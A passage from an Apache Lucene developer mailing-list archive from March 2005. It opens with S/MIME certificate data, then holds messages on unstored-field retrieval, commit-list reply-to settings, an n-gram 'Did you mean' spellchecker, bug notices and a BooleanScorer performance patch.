AQUFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2Fw ZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3VsdGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlv biBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENB MSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFpbEB0aGF3dGUuY29tMB4XDTAzMDcxNzAw MDAwMFoXDTEzMDcxNjIzNTk1OVowYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25z dWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1 aW5nIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEpjxVc1X7TrnKmVoeaMB1BHCd3+n/ ox7svc31W/Iadr1/DDph8r9RzgHU5VAKMNcCY1osiRVwjt3J8CuFWqo/cVbLrzwLB+fxH5E2JCoT zyvV84J3PQO+K/67GD4Hv0CAAmTXp6a7n2XRxSpUhQ9IBH+nttE8YQRAHmQZcmC3+wIDAQABo4GU MIGRMBIGA1UdEwEB/wQIMAYBAf8CAQAwQwYDVR0fBDwwOjA4oDagNIYyaHR0cDovL2NybC50aGF3 dGUuY29tL1RoYXd0ZVBlcnNvbmFsRnJlZW1haWxDQS5jcmwwCwYDVR0PBAQDAgEGMCkGA1UdEQQi MCCkHjAcMRowGAYDVQQDExFQcml2YXRlTGFiZWwyLTEzODANBgkqhkiG9w0BAQUFAAOBgQBIjNFQ g+oLLswNo2asZw9/r6y+whehQ5aUnX9MIbj4Nh+qLZ82L8D0HFAgk3A8/a3hYWLD2ToZfoSxmRsA xRoLgnSeJVCUYsfbJ3FXJY3dqZw5jowgT2Vfldr394fWxghOrvbqNOUQGls1TXfjViF4gtwhGTXe JLHTHUb/XV9lTzGCAucwggLjAgEBMGkwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBD b25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJ c3N1aW5nIENBAgMN53owCQYFKw4DAhoFAKCCAVMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAc BgkqhkiG9w0BCQUxDxcNMDUwMzI5MDEyNDIzWjAjBgkqhkiG9w0BCQQxFgQUySWJ47NN3ShvCDpl F+eodXhpztUweAYJKwYBBAGCNxAEMWswaTBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3Rl IENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWls IElzc3VpbmcgQ0ECAw3nejB6BgsqhkiG9w0BCRACCzFroGkwYjELMAkGA1UEBhMCWkExJTAjBgNV BAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25h bCBGcmVlbWFpbCBJc3N1aW5nIENBAgMN53owDQYJKoZIhvcNAQEBBQAEggEAOb1Hhd7/UMK7hYFi dOMoDNd3ZMWsBbO4ZDri7qPON2f2sJ6oOGqfCapCQgAo98sXrafI98Lvx7oxAARR+c7vsm2EGVTD WHIKNhRjNXohyYr4z+PmZtRwJ30n6wClsHrNT9iE9hQl86tlBIL2SM05kB0wUb6/+FeN2hSXed1n GdVB55tOF2Zy16ld+bhMRJmQNrT4Q5BNnzfFIPxEQaoDgzQstbODZQqar9FuhlmMtyzTdPS5/ziM DAGSimzrRPf4jfsAJz+gMbnwQYKg7n3EaGz4ymjrRcph7U19cwj6/EVA9nRy5L+y35uTHm8pwFm+ kW7xEcH4J12sv7Vrx1rfkwAAAAAAAA== --Apple-Mail-26-608277279-- From [email protected] Tue Mar 29 02:30:45 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89488 invoked from network); 29 Mar 2005 02:30:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 02:30:45 -0000 Received: (qmail 50336 invoked by uid 500); 29 Mar 2005 02:30:43 -0000 Delivered-To: [email protected] Received: (qmail 50316 invoked by uid 500); 29 Mar 2005 02:30:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50301 invoked by uid 99); 29 Mar 2005 02:30:43 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 28 Mar 2005 18:30:41 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 3ED6813E2122; Mon, 28 Mar 2005 21:30:36 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 5A5BE13E2007 for <[email protected]>; Mon, 28 Mar 2005 21:30:09 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: null pointer exception when try to get contents out of hits Date: Mon, 28 Mar 2005 21:30:14 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.2 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Mar 28, 2005, at 5:35 PM, Xiaozheng Ma wrote: > > Hi guys, > > I indexed the file by title and contents such as: > document.add(Field.Text("title", file.getTitle())); > document.add(Field.Text("contents", file.getTextContents())); > //the getTextContents() return the Reader type obj > > so far so good. I was able to search on both title and contents. > > Now since the title changed, I need to update the index(the contents > never change). Instead of calling file.getTextContents() again, I > figure > that it maybe faster if I can get the reader (of contents field) back > from the search hits(the original file could be huge). You're out of luck here. Field.Text(String, Reader) is an unstored field, so the contents are not in the index. There is one trick - you can access the terms that came from the analysis process over that text, but it is very unlikely to be the original contents. See how Luke does this if you need to go to that extreme. Erik > > While <hits.doc(0).get("title")> returns title as expected > > BUT the call on 'contents' returns null and raises null pointer > exception on further action. > Both > hits.doc(0).get("contents") > AND > hits.doc(0).getField("contents") > return null > > I tested that I could search on 'contents:something' and it returned > the > expected hit. > > I am using the Lucene one release before the current release. My > question is: is it possible to get the Reader object (or contents text > string in that matter) back after I get the hit and how. > > Thank you in advance! > > Xiaozheng > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 03:00:03 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96213 invoked from network); 29 Mar 2005 03:00:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 03:00:02 -0000 Received: (qmail 71494 invoked by uid 500); 29 Mar 2005 03:00:01 -0000 Delivered-To: [email protected] Received: (qmail 71442 invoked by uid 500); 29 Mar 2005 03:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71426 invoked by uid 99); 29 Mar 2005 03:00:00 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31106.mail.mud.yahoo.com (HELO web31106.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Mon, 28 Mar 2005 18:59:58 -0800 Received: (qmail 40026 invoked by uid 60001); 29 Mar 2005 02:59:56 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=0NzazypMgVdQoeRSIa3dK4elwwd3pWMLOtvJUScGYf56tC587f1ksykUMJM0OW2sQ7YJqERrKc5pG+A9+9lbGrrUPdAdmHz/Uf4x0X4ZP1XhCvevf7WtFCKLpsdU5OmBohXBV8UmqzxIxNkwroJWCc7BsMxzO9Ab2MR1Y8i7+7A= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31106.mail.mud.yahoo.com via HTTP; Mon, 28 Mar 2005 18:59:56 PST Date: Mon, 28 Mar 2005 18:59:56 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: svn commit: r159237 - in lucene/java/trunk: docs/mailinglists.html xdocs/mailinglists.xml To: [email protected] In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > href="http://mail-archives.eu.apache.org/mod_mbox/lucene-java-user/">Archive</a> > > You don't actually need the .eu anymore, mail-archives.a.o now points > to the same place as mail-archives.eu.a.o. I was wondering about that (but didn't try). Thanks, fixed. > And btw, the reply-to on the commits list is pointed to > [email protected], which doesn't exist... We should probably > point > that to a place that actually exists, perhaps the theoretical > [email protected] list for non-language specific discussions or something > > like that... I'm losing track of all the Lucene lists we now have. Is there general@lucene ? I just send a message to it. Nothing bounced, but I didn't get my email yet either. Otis --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 03:05:15 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97799 invoked from network); 29 Mar 2005 03:05:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 03:05:15 -0000 Received: (qmail 77006 invoked by uid 500); 29 Mar 2005 03:05:14 -0000 Delivered-To: [email protected] Received: (qmail 76559 invoked by uid 500); 29 Mar 2005 03:05:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76546 invoked by uid 99); 29 Mar 2005 03:05:13 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from relay03.pair.com (HELO relay03.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Mon, 28 Mar 2005 19:05:10 -0800 Received: (qmail 12647 invoked from network); 29 Mar 2005 03:05:07 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 29 Mar 2005 03:05:07 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Mon, 28 Mar 2005 22:05:12 -0500 From: Garrett Rooney <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (X11/20050111) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r159237 - in lucene/java/trunk: docs/mailinglists.html xdocs/mailinglists.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Otis Gospodnetic wrote: > I'm losing track of all the Lucene lists we now have. Is there > general@lucene ? I just send a message to it. Nothing bounced, but I > didn't get my email yet either. I know it had been discussed before, but I don't think it was ever created. It should be eventually, just like we should eventually do something about a TLP web page instead of just redirecting to /java, but hey, lack of 'tuits and so forth I suspect. Really though, we should decide what the final course of action on the commits lists is. I know Doug had wanted to split the various commits out onto per-project lists, but nobody'd gotten around to it. That would nicely answer the "where does reply-to get set to" question, but it would reduce the chances of java people pointing out the problems with my lucene4c commits, which is a net loss for me ;-) -garrett --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 09:05:46 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11953 invoked from network); 29 Mar 2005 09:05:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 09:05:46 -0000 Received: (qmail 27881 invoked by uid 500); 29 Mar 2005 09:05:44 -0000 Delivered-To: [email protected] Received: (qmail 27846 invoked by uid 500); 29 Mar 2005 09:05:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27833 invoked by uid 500); 29 Mar 2005 09:05:43 -0000 Delivered-To: [email protected] Received: (qmail 27827 invoked by uid 99); 29 Mar 2005 09:05:43 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 01:05:42 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 09484299; Tue, 29 Mar 2005 11:05:39 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33725] - [PATCH] NullPointerException when using nested SpanOrQuery in SpanNotQuery X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Tue, 29 Mar 2005 11:05:39 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33725>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33725 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |FIXED -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 11:17:41 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57772 invoked from network); 29 Mar 2005 11:17:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 11:17:40 -0000 Received: (qmail 83856 invoked by uid 500); 29 Mar 2005 11:17:38 -0000 Delivered-To: [email protected] Received: (qmail 83825 invoked by uid 500); 29 Mar 2005 11:17:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83811 invoked by uid 99); 29 Mar 2005 11:17:38 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from server1.hostmon.com (HELO server1.hostmon.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 03:17:34 -0800 Received: (qmail 17855 invoked by uid 532); 29 Mar 2005 11:16:09 -0000 Received: from [email protected] by server1.hostmon.com by uid 0 with qmail-scanner-1.16 (spamassassin: 3.0.0. Clear:. Processed in 0.107914 secs); 29 Mar 2005 11:16:09 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 29 Mar 2005 11:16:09 -0000 Message-ID: <[email protected]> Date: Tue, 29 Mar 2005 12:16:50 +0100 From: Dave Spencer <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.3) Gecko/20040910 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] CC: "Stefan F. Keller" <[email protected]> Subject: Re: New "Did you mean" feature: How to approach? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Otis Gospodnetic wrote: >Maybe the spellchecker at the bottom of the following URL will help: > > http://svn.apache.org/repos/asf/lucene/java/trunk/contrib/ > > Yeah, I did this, the "ngram based spelling corrector". You build a normal lucene index as you always do then run NGramSpeller, analyzes your index to determine which ngrams are used, and saves this in a separate Lucene index then you call NGramSpeller.suggestUsingNGrams() if a users query doesn't return too many results weblog entry here w/ more info and a test page: http://www.searchmorph.com/weblog/index.php?id=23 -- Some chance you'll be instested in the "more like this" similarity query generator - see the "similar" tree in the sandbox -- Dave >Otis > > >--- "Stefan F. Keller" <[email protected]> wrote: > > >>We would like to add "Did you mean..." to our Lucene-based search >>engine www.geometa.info. Doug mentioned in his recent interview that >>this feature would be not too complicated to implement. >> >>First I considered integrating a spelling checker (through JADT-API) >>but one would rather expect "nearby" words which really exist in the >>document pool. Some people have mentioned this feature here (or on >>the >>java-user-list). >> >>=> Is anyone aware of any real developments in this area? >> >>Ideally, one would combine the data already maintained by the >>IndexReader class with an existing similarity search algorithm (like >>trigram)... >> >>=> Any ideas? >> >>Stefan >> >>--------------------------------------------------------------------- >>To unsubscribe, e-mail: [email protected] >>For additional commands, e-mail: [email protected] >> >> >> >> > >--------------------------------------------------------------------- >To unsubscribe, e-mail: [email protected] >For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 15:03:02 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52821 invoked from network); 29 Mar 2005 15:03:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 15:03:02 -0000 Received: (qmail 40540 invoked by uid 500); 29 Mar 2005 15:02:59 -0000 Delivered-To: [email protected] Received: (qmail 40465 invoked by uid 500); 29 Mar 2005 15:02:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40451 invoked by uid 99); 29 Mar 2005 15:02:59 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from redwood.xs4all.nl (HELO gwnl.redwood.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 07:02:57 -0800 Received: from localhost (gwnl [161.129.204.104]) by gwnl.redwood.com (Postfix) with ESMTP id 67F7A13FBE for <[email protected]>; Tue, 29 Mar 2005 17:02:54 +0200 (CEST) Received: from gwnl.redwood.com ([161.129.204.104]) by localhost (gwnl [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 05028-08 for <[email protected]>; Tue, 29 Mar 2005 17:02:50 +0200 (CEST) Received: from excus1.raleigh.us.rw (excus1 [161.129.204.104]) by gwnl.redwood.com (Postfix) with ESMTP id 4B8BF13FA2 for <[email protected]>; Tue, 29 Mar 2005 17:02:50 +0200 (CEST) X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Subject: RE: null pointer exception when try to get contents out of hits Date: Tue, 29 Mar 2005 10:02:49 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: null pointer exception when try to get contents out of hits Thread-Index: AcU0B1UJRFzdkkCPSnuCpogOeemJ/AAZ/H2A From: "Xiaozheng Ma" <[email protected]> To: <[email protected]> X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at redwood.com X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thanks for your reply. Actually I didn't mean to get the original contents from the index, what I want is to get the index of the contents (maybe in the type of Reader) so that after I put it back with the new title, I can do the search on contents. =20 You guys really have done a great job!! Xiaozheng > I indexed the file by title and contents such as: > document.add(Field.Text("title", file.getTitle())); > document.add(Field.Text("contents", file.getTextContents())); > //the getTextContents() return the Reader type obj > > so far so good. I was able to search on both title and contents. > > Now since the title changed, I need to update the index(the contents > never change). Instead of calling file.getTextContents() again, I=20 > figure > that it maybe faster if I can get the reader (of contents field) back > from the search hits(the original file could be huge). You're out of luck here. Field.Text(String, Reader) is an unstored=20 field, so the contents are not in the index. There is one trick - you can access the terms that came from the=20 analysis process over that text, but it is very unlikely to be the=20 original contents. See how Luke does this if you need to go to that=20 extreme. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 16:32:12 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79703 invoked from network); 29 Mar 2005 16:32:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 16:32:11 -0000 Received: (qmail 87628 invoked by uid 500); 29 Mar 2005 16:32:09 -0000 Delivered-To: [email protected] Received: (qmail 87588 invoked by uid 500); 29 Mar 2005 16:32:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87569 invoked by uid 99); 29 Mar 2005 16:32:08 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from server1.hostmon.com (HELO server1.hostmon.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 08:32:06 -0800 Received: (qmail 7314 invoked by uid 532); 29 Mar 2005 16:30:40 -0000 Received: from [email protected] by server1.hostmon.com by uid 0 with qmail-scanner-1.16 (spamassassin: 3.0.0. Clear:. Processed in 0.108782 secs); 29 Mar 2005 16:30:40 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 29 Mar 2005 16:30:40 -0000 Message-ID: <[email protected]> Date: Tue, 29 Mar 2005 17:31:20 +0100 From: Dave Spencer <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.3) Gecko/20040910 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] CC: "Stefan F. Keller" <[email protected]> Subject: Re: New "Did you mean" feature: How to approach? References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dave Spencer wrote: > Otis Gospodnetic wrote: > >> Maybe the spellchecker at the bottom of the following URL will help: >> >> http://svn.apache.org/repos/asf/lucene/java/trunk/contrib/ >> >> > > Yeah, I did this, the "ngram based spelling corrector". > > You build a normal lucene index as you always do > then run NGramSpeller, analyzes your index to determine which ngrams > are used, and saves this in a separate Lucene index > then you call NGramSpeller.suggestUsingNGrams() if a users query > doesn't return too many results > > weblog entry here w/ more info and a test page: > > http://www.searchmorph.com/weblog/index.php?id=23 Oh and if not obvious from the above, the code is in use live. I searchmorph has a search engine of javadoc pages. Here I search for "hashmep" (intending 'hashmap') http://www.searchmorph.com/kat/search.jsp?s=hashmep See the suggestions after the text "I cannot find hashmep anywhere. Instead try these variations..." and note that it read my mind :) and hashmap is the first suggestion. > > -- > > Some chance you'll be instested in the "more like this" similarity > query generator - see the "similar" tree in the sandbox > > -- Dave > >> Otis >> >> >> --- "Stefan F. Keller" <[email protected]> wrote: >> >> >>> We would like to add "Did you mean..." to our Lucene-based search >>> engine www.geometa.info. Doug mentioned in his recent interview that >>> this feature would be not too complicated to implement. >>> >>> First I considered integrating a spelling checker (through JADT-API) >>> but one would rather expect "nearby" words which really exist in the >>> document pool. Some people have mentioned this feature here (or on >>> the >>> java-user-list). >>> >>> => Is anyone aware of any real developments in this area? >>> Ideally, one would combine the data already maintained by the >>> IndexReader class with an existing similarity search algorithm (like >>> trigram)... >>> >>> => Any ideas? >>> >>> Stefan >>> >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>> >>> >>> >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> >> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 21:30:35 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30235 invoked from network); 29 Mar 2005 21:30:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 21:30:34 -0000 Received: (qmail 53660 invoked by uid 500); 29 Mar 2005 21:30:34 -0000 Delivered-To: [email protected] Received: (qmail 53209 invoked by uid 500); 29 Mar 2005 21:30:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53194 invoked by uid 500); 29 Mar 2005 21:30:32 -0000 Delivered-To: [email protected] Received: (qmail 53186 invoked by uid 99); 29 Mar 2005 21:30:32 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 29 Mar 2005 13:30:31 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 935302CA; Tue, 29 Mar 2005 23:30:28 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33019] - [PATCH] BooleanScorer can score documents in non increasing order X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Tue, 29 Mar 2005 23:30:28 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33019>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33019 ------- Additional Comments From [email protected] 2005-03-29 23:30 ------- Created an attachment (id=14589) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14589&action=view) BooleanScorer1.java This is an alternative to BooleanScorer that uses buckets for speed. Here an extra array of indexes into the bucket array is used instead of a linked list over the buckets. The indexes in this extra array consist of the low bits of the document numbers in the current range. This can be sorted by a simple call to Arrays.sort() by allowSkipTo(). Doing such sorting retrieves the docs in order and allows skipTo on BooleanScorer1, but it also doubles the overhead time of BooleanScorer1. To my suprise BooleanScorer1 without skipTo() takes 85%-98% of the time required by the current BooleanScorer in test cases of TestDisjunctionPerf1.java. In other words, BooleanScorer1 is a bit faster than the current BooleanScorer on disjunctions. The only cause I can think of for the performance improvement is better use of L2/L1 cache. To keep things from getting simple, the current performance order of the various boolean scorers on disjunctions is: 1. BooleanScorer1 without skipTo() 2. BooleanScorer without skipTo() 3. DisjunctionScorer 4. BooleanScorer1 with skipTo() 5. BooleanScorer (as posted on 26 March) with skipTo() So I would propose that BooleanScorer1 replaces the current BooleanScorer. I used a new name BooleanScorer1 because it is a rather drastic change to BooleanScorer and I'd like to see some verification before the replacement. Regards, Paul Elschot -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or 